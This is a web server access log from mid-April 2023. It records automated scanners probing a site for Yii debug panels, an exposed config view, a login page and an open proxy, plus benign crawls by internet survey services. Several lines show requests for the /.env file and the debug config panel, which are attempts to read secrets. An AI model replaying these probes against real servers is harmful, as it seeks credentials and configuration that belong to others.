20.234.111.129 - - [14/Apr/2023:23:37:09 +0000] "POST /debug/default/view HTTP/1.1" 405 411895 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:10 +0000] "POST /frontend/web/debug/default/view HTTP/1.1" 405 412623 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:11 +0000] "POST /web/debug/default/view HTTP/1.1" 405 412167 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:13 +0000] "POST /sapi/debug/default/view HTTP/1.1" 405 412185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:14 +0000] "POST /debug/default/view?panel=config HTTP/1.1" 405 413104 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:23:37:28 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:23:37:28 +0000] "POST / HTTP/1.1" 405 409715 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:23:49:48 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.235.24.156 - - [15/Apr/2023:00:07:14 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.32.162.159 - - [15/Apr/2023:00:23:57 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.188.210.227 - - [15/Apr/2023:00:49:56 +0000] "GET http://5.188.210.227/echo.php HTTP/1.1" 200 - "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
71.6.165.200 - - [15/Apr/2023:00:54:30 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.165.200 - - [15/Apr/2023:00:54:32 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "-"
71.6.165.200 - - [15/Apr/2023:00:54:32 +0000] "GET /sitemap.xml HTTP/1.1" 200 2580 "-" "-"
71.6.165.200 - - [15/Apr/2023:00:54:33 +0000] "GET /.well-known/security.txt HTTP/1.1" 200 - "-" "-"
71.6.165.200 - - [15/Apr/2023:00:54:34 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
172.105.128.12 - - [15/Apr/2023:01:00:22 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.244.48 - - [15/Apr/2023:01:01:59 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [15/Apr/2023:01:01:59 +0000] "POST / HTTP/1.1" 405 409709 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
